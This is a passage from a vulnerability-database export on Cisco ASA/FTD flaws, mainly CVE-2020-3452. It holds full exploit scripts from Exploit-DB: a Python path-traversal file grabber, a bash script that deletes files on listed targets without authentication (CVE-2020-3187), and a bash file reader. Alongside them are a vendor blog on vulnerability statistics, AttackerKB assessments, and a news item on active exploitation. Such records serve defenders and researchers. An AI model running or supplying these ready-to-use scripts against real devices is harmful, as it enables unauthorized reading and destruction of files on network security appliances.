\"downloaded!, $website is vulnerable to CVE-2020-3452.\"\r\n else\r\n echo \"not vulnerable!\"\r\n rm -rf $filename\r\n fi\r\n fi\r\n\r\nfi", "sourceHref": "https://www.exploit-db.com/download/48722", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-16T06:05:53", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-15T00:00:00", "type": "exploitdb", "title": "Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-3452", "CVE-2020-3452"], "modified": "2020-12-15T00:00:00", "id": "EDB-ID:49262", "href": "https://www.exploit-db.com/exploits/49262", "sourceData": "# Exploit Title: Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)\r\n# Date: 12 Dec 2020\r\n# Exploit Author: Freakyclown@cygenta.co.uk\r\n# Vendor Homepage: cisco.com\r\n# Software Link: It\u2019s against Hardware, specifically ASA\u2019s and FTD\u2019s\r\n# Version: ASAs (from version 9.6 to 9.14.1.10) and FTD\u2019s (versions 6.2.3 to 6.6.0.1)\r\n# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14\r\n# CVE : CVE-2020-3452\r\n# Github : https://github.com/cygenta/CVE-2020-3452\r\n\r\nimport requests\r\n\r\n# Written by freakyclown for @CygentaHQ\r\n# Cisco ASA Path Traversal\r\n# CVE-2020-3452\r\n# Usage: CVE-2020-3452.py {target}\"\r\n# Example: CVE-2020-3452.py 192.168.0.12\"\r\n# Requires - Requests - pip3 install requests\r\n#\r\n# This tool takes advantage of the above cve and attempts to\r\n# download files as listed below, it is suggested that you make\r\n# a working folder for the outputfiles to avoid confusion if\r\n# attacking mutliple ASA's\r\n\r\n# set your target\r\ntarget = input(\"Enter target IP/Url: \")\r\n\r\n\r\ndef grabstuff():\r\n for file in files:\r\n print(\"trying: \", file)\r\n\r\n #set request parameters\r\n params = (\r\n ('type', 'mst'),\r\n ('textdomain', '+CSCOE+/'+file),\r\n ('default-language', ''),\r\n ('lang', '../'),\r\n )\r\n\r\n # set the response to the result of the request, inputting in target and params and ignoring ssl cert problems\r\n response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False)\r\n # write the file to the disk\r\n f = open(file,\"w\")\r\n f.write(response.text) \r\n f.close()\r\n\r\n\r\n\r\n# this is a list of files available to download, more will be added in time\r\n# if anyone has a list of ASA files, I'd be happy to add here\r\nfiles = {\r\n\"sess_update.html\",\r\n\"blank.html\",\r\n\"noportal.html\",\r\n\"portal_ce.html\",\r\n\"portal.html\",\r\n\"logon_custom.css\",\r\n\"svc.html\",\r\n\"logo.gif\",\r\n\"portal_inc.lua\",\r\n\"nostcaccess.html\",\r\n\"session.js\",\r\n\"portal.js\",\r\n\"portal_custom.css\",\r\n\"running.conf\",\r\n\"tlbrportal_forms.js\",\r\n\"logon_forms.js\",\r\n\"win.js\",\r\n\"portal.css\",\r\n\"lced.html\",\r\n\"pluginlib.js\",\r\n\"useralert.html\",\r\n\"ping.html\",\r\n\"app_index.html\",\r\n\"shshimdo_url\",\r\n\"session_password.html\",\r\n\"relayjar.html\",\r\n\"relayocx.html\",\r\n\"color_picker.js\",\r\n\"color_picker.html\",\r\n\"cedhelp.html\",\r\n\"cedmain.html\",\r\n\"cedlogon.html\",\r\n\"cedportal.html\",\r\n\"portal_elements.html\",\r\n\"commonspawn.js\",\r\n\"common.js\",\r\n\"appstart.js\",\r\n\"relaymonjar.html\",\r\n\"relaymonocx.html\",\r\n\"cedsave.html\",\r\n\"tunnel_linux.jnlp\",\r\n\"ask.html\",\r\n\"no_svc.html\",\r\n\"preview.html\",\r\n\"cedf.html\",\r\n\"ced.html\",\r\n\"logon_redirect.html\",\r\n\"logout.html\",\r\n\"tunnel_mac.jnlp\",\r\n\"gp-gip.html\",\r\n\"auth.html\",\r\n\"wrong_url.html\",\r\n\"logon.html\"}\r\n\r\n\r\n# obvious thing is obvious, try the things and barf if fail\r\ntry:\r\n grabstuff()\r\nexcept Exception as err:\r\n print(\"Something went wrong sorry\")\r\n print(err)", "sourceHref": "https://www.exploit-db.com/download/49262", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-16T04:09:59", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-07-29T00:00:00", "type": "exploitdb", "title": "Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-3187", "CVE-2020-3187", "CVE-2020-3452"], "modified": "2020-07-29T00:00:00", "id": "EDB-ID:48723", "href": "https://www.exploit-db.com/exploits/48723", "sourceData": "# Exploit Title: Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion\r\n# Google Dork: inurl:/+CSCOE+/\r\n# Date: 2020-08-27\r\n# Exploit Author: 0xmmnbassel\r\n# Vendor Homepage: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html#~models\r\n# Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60\r\n# Vulnerability Type: unauthenticated file deletion\r\n# Version: Cisco ASA Software releases 9.5 and earlier, as well as\r\n# Release 9.7, have reached end of software maintenance. Customers are\r\n# advised to migrate to a supported release that includes the fix for\r\n# this vulnerability.\r\n# CVE : CVE-2020-3187\r\n\r\n#!/bin/bash\r\n\r\ndelete=\"csco_logo.gif\"\r\n\r\n\r\nhelpFunction()\r\n{\r\necho \"\"\r\necho -e \"\\t\\tCVE-2020-3187\"\r\necho \"\"\r\necho \"Usage: $0 -l targets.txt -d csco_logo.gif \"\r\necho -e \"\\t-l for list of IPs in text file\"\r\necho -e \"\\t-d file to be deleted, default: ./+CSCOE+/csco_logo.gif\"\r\necho -e \"\\t-i for single IP test\"\r\nexit 1\r\n}\r\n\r\nwhile getopts \"l:d:i:\" opt\r\ndo\r\ncase \"$opt\" in\r\nl ) input=\"$OPTARG\" ;;\r\nd ) delete=\"$OPTARG\" ;;\r\ni ) website=\"$OPTARG\" ;;\r\n? ) helpFunction ;;\r\nesac\r\ndone\r\n\r\n\r\n#if $website is empty or $input is empty\r\nif [ -z \"$website\" ] && [ -z \"$input\" ]\r\nthen\r\necho \"Some/all of the parameters are empty\";\r\nhelpFunction\r\nfi\r\n\r\n#usage\r\n\r\nif [ -z \"$input\"];\r\nthen\r\nstatus=$(curl -LI $website/+CSCOU+/$delete -o /dev/null -w\r\n'%{http_code}\\n' -s)\r\necho \"checking if $website has the $delete file\"\r\nif [ $status -eq 200 ]; then\r\necho \"$website/+CSCOU+/$delete exists, deleting it...\"\r\ncurl -H \"Cookie: token=..//+CSCOU+/$delete\" -v -s -o\r\nresultsindv.txt $website/+CSCOE+/session_password.html\r\ndelcheck=$(curl -LI $website/+CSCOU+/$delete -o /dev/null -w\r\n'%{http_code}\\n' -s)\r\nif [ delcheck -eq 404]; then\r\necho \"Deleted!, $website is vulnerable to CVE-2020-3187.\"\r\nelse\r\necho \"Cannot Delete $website/+CSCOU+/$delete file, check it manaully!\"\r\nfi\r\nelse\r\necho \"$website/+CSCOU+/$delete doesn't exist!\"\r\nfi\r\n\r\nelse\r\nwhile IFS= read -r line\r\ndo\r\necho \"Checking $line if file $delete exist..\"\r\n#echo $response\r\nstatus=$(curl -LI $line/+CSCOU+/$delete -o /dev/null -w\r\n'%{http_code}\\n' -s)\r\nif [ $status -eq 200 ]; then\r\necho \"$line/+CSCOU+/$delete exists, deleting it...\"\r\ncurl -H \"Cookie: token=..//+CSCOU+/$delete\" -v -s -o\r\nresults.txt $line/+CSCOE+/session_password.html\r\n\r\n#for no verbosity\r\n#curl -H \"Cookie: token=..//+CSCOU+/$delete\" -s -o\r\nresults.txt $line/+CSCOE+/session_password.html\r\ndelcheck=$(curl -LI $line/+CSCOU+/$delete -o /dev/null -w\r\n'%{http_code}\\n' -s)\r\nif [ delcheck -eq 404]; then\r\necho \"Deleted!, $line is vulnerable to CVE-2020-3187.\"\r\nelse\r\necho \"Cannot Delete $line/+CSCOU+/$delete file, check it manaully!\"\r\nfi\r\nelse\r\necho \"$line/+CSCOU+/$delete doesn't exist!\"\r\nfi\r\ndone < \"$input\"\r\n\r\n\r\nfi\r\n\r\n\r\n\r\n\r\n#!/bin/bash\r\n\r\n\r\nread=\"%2bCSCOE%2b/portal_inc.lua\"\r\n\r\n\r\nhelpFunction()\r\n{\r\n echo \"\"\r\n echo -e \"\\t\\tCVE-2020-3452\"\r\n echo \"\"\r\n echo \"Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua \"\r\n echo -e \"\\t-l for list of IPs in text file\"\r\n echo -e \"\\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua\"\r\n echo -e \"\\t-i for single IP test\"\r\n exit 1\r\n}\r\n\r\nwhile getopts \"l:r:i:\" opt\r\ndo\r\n case \"$opt\" in\r\n l ) input=\"$OPTARG\" ;;\r\n r ) read=\"$OPTARG\" ;;\r\n i ) website=\"$OPTARG\" ;;\r\n ? ) helpFunction ;;\r\n esac\r\ndone\r\n\r\n\r\n\r\n#if $website is empty or $input is empty\r\nif [ -z \"$website\" ] && [ -z \"$input\" ]\r\nthen\r\n echo \"Some/all of the parameters are empty\";\r\n helpFunction\r\nfi\r\n\r\n#usage\r\n\r\n\r\nif [ -z \"$website\"];\r\n then\r\n while IFS= read -r line\r\n do\r\n name=$(echo $line | cut -c9-19)\r\n #echo \"testing $line\"\r\n filename=\"$name.txt\"\r\n #echo $response\r\n status=$(curl -LI $line\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s)\r\n\r\n if [ $status -eq \"400\" ]; then\r\n echo \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\"\r\n else\r\n wget \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt\r\n\r\n if [ -s $filename ]; then\r\n echo \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\"\r\n echo \"downloaded!, $line is vulnerable to CVE-2020-3452.\"\r\n\r\n else\r\n echo \"not vulnerable!\"\r\n rm -rf $filename\r\n fi\r\n fi\r\n done < \"$input\"\r\n else\r\n\r\n name=$(echo $website | cut -c9-16)\r\n filename=\"$name.txt\"\r\n\r\n status=$(curl -LI $website\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s)\r\n if [ $status -eq \"Bad Request\" ]; then\r\n echo \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\"\r\n else\r\n\r\n echo \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\"\r\n wget \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt\r\n if [ -s $filename ]; then\r\n echo \"downloaded!, $website is vulnerable to CVE-2020-3452.\"\r\n else\r\n echo \"not vulnerable!\"\r\n rm -rf $filename\r\n fi\r\n fi\r\n\r\nfi", "sourceHref": "https://www.exploit-db.com/download/48723", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2021-02-24T14:27:01", "description": "Imperva\u2019s report, [**The State of Vulnerabilities in 2020**](<https://www.imperva.com/resources/resource-library/reports/the-state-of-vulnerabilities-in-2020/>) has revealed that unlike in previous years, researchers observed a fall in the number of vulnerabilities last year, even as businesses were compelled to accelerate digital transformation processes due to the COVID-19 pandemic. Vulnerabilities are defined as the gaps or weaknesses that undermine an organization\u2019s IT security efforts, such as a firewall flaw that enables hackers into a network.\n\nThe overall number of new vulnerabilities in 2020 (23,006) was down by 2.04% compared to 2019 (23,485) and by 0.86% compared to 2018 (23,207).\n\nAccording to the report, the dominant root cause of vulnerabilities was [cross-site scripting](<https://www.imperva.com/learn/application-security/cross-site-scripting-xss-attacks/>) (XSS) with injection as the second-most dominant root cause. Drilling down into the report data, the researchers note that a large percentage of this appeared to be related to [SQL injection](<https://www.imperva.com/learn/application-security/sql-injection-sqli/>). While XSS was the dominant root cause of vulnerabilities, most of the attacks in 2020 were related to injection vulnerabilities rather than XSS. Only 15.68% of the attacks that Imperva registered were related to XSS. On the contrary, the injection vulnerability category appeared to be the attackers\u2019 \u201cfavorite\u201d with 44.75% of all attacks. After injection vulnerability, path traversal and local file include (LFI) attacks were the attackers\u2019 second \u201cfavorite\u201d with 24.83%.\n\nSocial media, in fact, echoed this finding with 75% of the top 20 most viral tweets being related to the leading attack category, injection and remote code execution. Researchers observed a high correlation between the chatter in social media and actual attacks. Analyzing tweets from Twitter, the two most trending vulnerabilities on social media belonged to CVE-2020-5902 and CVE-2020-3452 which were also the top vulnerabilities used by hackers in 2020.\n\nImperva researchers continued to see a constant growth of vulnerabilities in APIs (Application Programming Interfaces) in 2020, with WordPress the most popular platform in the content management system category. In the server side technologies category, the report indicates an increase in the number of vulnerabilities in applications or packages written in JavaScript for NodeJS.\n\nThe report also shows MySQL to be ahead of all other popular databases in terms of new vulnerabilities discovered in 2020, although 92.4% of these had an unknown exploit. This is likely because Oracle acquired MySQL and doesn\u2019t usually share technical details in its security reports. Additional analysis of bug bounty vulnerabilities revealed that almost 40% of them were ranked as Critical.\n\n### Vulnerabilities and cyber security attacks forecast for 2021\n\nGiven the degree to which APIs have become a necessary element for applications, Imperva researchers expect to see constant growth in the number of API vulnerabilities, although the rate of this growth is likely to decrease in 2021. The release of the OWASP API Security - Top 10 which standardizes the main threats in APIs will increase the awareness of security among developers and play a role in decreasing vulnerabilities.\n\nOld faithful injection and XSS vulnerabilities will remain a serious concern, despite greater awareness and the number of tools that check code for their presence. The reason for this is the direct impact of the exploitation of these vulnerabilities, as well as - in most cases - the lack of preconditions required to exploit them. Injection vulnerabilities may also lead to [supply chain attacks](<https://www.imperva.com/learn/application-security/supply-chain-attack/>) resulting in [PII](<https://www.imperva.com/learn/data-security/personally-identifiable-information-pii/>) data theft.\n\nThe number of vulnerabilities in third-parties will continue to grow, as major platforms and frameworks become more reliant on third-party plugins. These vulnerabilities may be the gateway to various supply chain attacks. WordPress has over 58,000 plugins, the NPM registry has almost 1.5 million packages for NodeJS, and PyPI has over 280,000 packages for Python. In addition, there are also main package registries for Java and Ruby-based projects. As the community continues to grow, and without code standards or restrictions to publish a plugin or a package, they remain the weakest point in an application, making them the sweet spot for attackers.\n\nDownload the full report [here](<https://www.imperva.com/resources/resource-library/reports/the-state-of-vulnerabilities-in-2020/>).\n\n### Protect your apps from attack with a Web Application Firewall (WAF)\n\nOne of the best solutions for protecting against web application database vulnerabilities is to deploy a [Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) (WAF) and Data Monitoring & Protection. The solution may be either on-premise, in the cloud, or a combination of both depending on your needs, infrastructure, and more. Start a [free trial](<https://www.imperva.com/free-trial/>) today.\n\nThe post [Despite COVID-19 pandemic, Imperva reports number of vulnerabilities decreased in 2020](<https://www.imperva.com/blog/despite-covid-19-pandemic-imperva-reports-number-of-vulnerabilities-decreased-in-2020/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-22T19:42:10", "type": "impervablog", "title": "Despite COVID-19 pandemic, Imperva reports number of vulnerabilities decreased in 2020", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452", "CVE-2020-5902"], "modified": "2021-02-22T19:42:10", "id": "IMPERVABLOG:6F67E97EF55C748CBFEE482E85D4751A", "href": "https://www.imperva.com/blog/despite-covid-19-pandemic-imperva-reports-number-of-vulnerabilities-decreased-in-2020/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-07-20T20:11:22", "description": "A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n \n**Recent assessments:** \n \n**todmephis** at September 30, 2020 3:37pm UTC reported:\n\nNothing valuable was exposed by vulnerability, also it was not possible to expand the scope or weaponize it. \nThis module was also tested with no success: <https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/cisco_directory_traversal.md> \nPoC: <https://twitter.com/aboul3la/status/1286012324722155525> \n<https://www.youtube.com/watch?v=74ExOh6BVxk>\n\nFile Entry Points:\n\nlogo.gif \nhttp_auth.html \nuser_dialog.html \nlocalization_inc.lua \nportal_inc.lua \ninclude \nnostcaccess.html \nask.html \nno_svc.html \nsvc.html \nsession.js \nuseralert.html \nping.html \nhelp \napp_index.html \ntlbr \nportal_forms.js \nlogon_forms.js \nwin.js \nportal.css \nportal.js \nsess_update.html \nblank.html \nnoportal.html \nportal_ce.html \nportal.html \nhome \nlogon_custom.css \nportal_custom.css \npreview.html \nsession_expired \ncustom \nportal_elements.html \ncommonspawn.js \ncommon.js \nappstart.js \nappstatus \nrelaymonjar.html \nrelaymonocx.html \nrelayjar.html \nrelayocx.html \nportal_img \ncolor_picker.js \ncolor_picker.html \ncedhelp.html \ncedmain.html \ncedlogon.html \ncedportal.html \ncedsave.html \ncedf.html \nced.html \nlced.html \nfiles \npluginlib.js \nshshim \ndo_url \nclear_cache \nconnection_failed_form \napcf \nucte_forbidden_data \nucte_forbidden_url \ncookie \nsession_password.html \ntunnel_linux.jnlp \ntunnel_mac.jnlp \nsdesktop \ngp-gip.html \nauth.html \nwrong_url.html \nlogon_redirect.html \nlogout.html \nlogon.html \ntest_chargen\n\n**busterb** at July 22, 2020 7:24pm UTC reported:\n\nNothing valuable was exposed by vulnerability, also it was not possible to expand the scope or weaponize it. \nThis module was also tested with no success: <https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/cisco_directory_traversal.md> \nPoC: <https://twitter.com/aboul3la/status/1286012324722155525> \n<https://www.youtube.com/watch?v=74ExOh6BVxk>\n\nFile Entry Points:\n\nlogo.gif \nhttp_auth.html \nuser_dialog.html \nlocalization_inc.lua \nportal_inc.lua \ninclude \nnostcaccess.html \nask.html \nno_svc.html \nsvc.html \nsession.js \nuseralert.html \nping.html \nhelp \napp_index.html \ntlbr \nportal_forms.js \nlogon_forms.js \nwin.js \nportal.css \nportal.js \nsess_update.html \nblank.html \nnoportal.html \nportal_ce.html \nportal.html \nhome \nlogon_custom.css \nportal_custom.css \npreview.html \nsession_expired \ncustom \nportal_elements.html \ncommonspawn.js \ncommon.js \nappstart.js \nappstatus \nrelaymonjar.html \nrelaymonocx.html \nrelayjar.html \nrelayocx.html \nportal_img \ncolor_picker.js \ncolor_picker.html \ncedhelp.html \ncedmain.html \ncedlogon.html \ncedportal.html \ncedsave.html \ncedf.html \nced.html \nlced.html \nfiles \npluginlib.js \nshshim \ndo_url \nclear_cache \nconnection_failed_form \napcf \nucte_forbidden_data \nucte_forbidden_url \ncookie \nsession_password.html \ntunnel_linux.jnlp \ntunnel_mac.jnlp \nsdesktop \ngp-gip.html \nauth.html \nwrong_url.html \nlogon_redirect.html \nlogout.html \nlogon.html \ntest_chargen\n\n**ccondon-r7** at August 04, 2020 4:15pm UTC reported:\n\nNothing valuable was exposed by vulnerability, also it was not possible to expand the scope or weaponize it. \nThis module was also tested with no success: <https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/cisco_directory_traversal.md> \nPoC: <https://twitter.com/aboul3la/status/1286012324722155525> \n<https://www.youtube.com/watch?v=74ExOh6BVxk>\n\nFile Entry Points:\n\nlogo.gif \nhttp_auth.html \nuser_dialog.html \nlocalization_inc.lua \nportal_inc.lua \ninclude \nnostcaccess.html \nask.html \nno_svc.html \nsvc.html \nsession.js \nuseralert.html \nping.html \nhelp \napp_index.html \ntlbr \nportal_forms.js \nlogon_forms.js \nwin.js \nportal.css \nportal.js \nsess_update.html \nblank.html \nnoportal.html \nportal_ce.html \nportal.html \nhome \nlogon_custom.css \nportal_custom.css \npreview.html \nsession_expired \ncustom \nportal_elements.html \ncommonspawn.js \ncommon.js \nappstart.js \nappstatus \nrelaymonjar.html \nrelaymonocx.html \nrelayjar.html \nrelayocx.html \nportal_img \ncolor_picker.js \ncolor_picker.html \ncedhelp.html \ncedmain.html \ncedlogon.html \ncedportal.html \ncedsave.html \ncedf.html \nced.html \nlced.html \nfiles \npluginlib.js \nshshim \ndo_url \nclear_cache \nconnection_failed_form \napcf \nucte_forbidden_data \nucte_forbidden_url \ncookie \nsession_password.html \ntunnel_linux.jnlp \ntunnel_mac.jnlp \nsdesktop \ngp-gip.html \nauth.html \nwrong_url.html \nlogon_redirect.html \nlogout.html \nlogon.html \ntest_chargen\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2Assessed Attacker Value: 5\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2020-07-22T00:00:00", "type": "attackerkb", "title": "CVE-2020-3452 Cisco ASA / Firepower Read-Only Path Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3187", "CVE-2020-3452"], "modified": "2020-12-21T00:00:00", "id": "AKB:63A96584-6094-4433-8AE0-1C1CD1B1C345", "href": "https://attackerkb.com/topics/XGKhvbDsLA/cve-2020-3452-cisco-asa-firepower-read-only-path-traversal-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:54", "description": "[](<https://thehackernews.com/images/-tjjYBmcca9c/YNluSotRJvI/AAAAAAAADAo/Xa7v4Mhy6ckqFcAlDlyulMQJaAFb4NMvwCLcBGAsYHQ/s0/cisco.jpg>)\n\nA security vulnerability in Cisco Adaptive Security Appliance (ASA) that was addressed by the company last October, and again earlier this April, has been subjected to active in-the-wild attacks following the release of proof-of-concept (PoC) exploit code.\n\nThe PoC was [published](<https://twitter.com/ptswarm/status/1408050644460650502>) by researchers from cybersecurity firm Positive Technologies on June 24, following which reports emerged that attackers are chasing after an exploit for the bug.\n\n\"Tenable has also received a report that attackers are exploiting CVE-2020-3580 in the wild,\" the cyber exposure company [said](<https://www.tenable.com/blog/cve-2020-3580-proof-of-concept-published-for-cisco-asa-flaw-patched-in-october>).\n\n[](<https://thehackernews.com/images/-2-rqA8MJiRM/YNlrTddMsEI/AAAAAAAADAg/pGvuWEREWDEGI3u_A6lMsi6FBLq6Pr0XwCLcBGAsYHQ/s0/cisco-exploit.jpg>)\n\nTracked as [CVE-2020-3580](<https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-asaftd-xss-multiple-FCB3vPZe.html>) (CVSS score: 6.1), the issue concerns multiple vulnerabilities in the web services interface of Cisco ASA software and Cisco Firepower Threat Defense (FTD) software that could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks on an affected device.\n\nAs of July 2020, there were a little over [85,000 ASA/FTD devices](<https://www.rapid7.com/blog/post/2020/07/23/cve-2020-3452-cisco-asa-firepower-read-only-path-traversal-vulnerability-what-you-need-to-know/>), 398 of which are spread across 17% of the Fortune 500 companies, according to cybersecurity company Rapid7.\n\nSuccessful exploitation, such as scenarios where a user of the interface is convinced to click a specially-crafted link, could permit the adversary to execute arbitrary JavaScript code in the context of the interface or access sensitive, browser-based information.\n\nAlthough Cisco remediated the flaw in October 2020, the network equipment company subsequently determined the fix to be \"incomplete,\" thereby requiring a second round of patches that were released on April 28, 2021.\n\nIn light of public PoC availability, it's recommended that organizations prioritize patching CVE-2020-3580 to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-28T06:39:00", "type": "thn", "title": "Cisco ASA Flaw Under Active Attack After PoC Exploit Posted Online", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452", "CVE-2020-3580"], "modified": "2021-06-30T15:48:38", "id": "THN:E61FB01ED36F5A39FD247813F1A893BD", "href": "https://thehackernews.com/2021/06/cisco-asa-flaw-under-active-attack.html", "cvss": {"score": 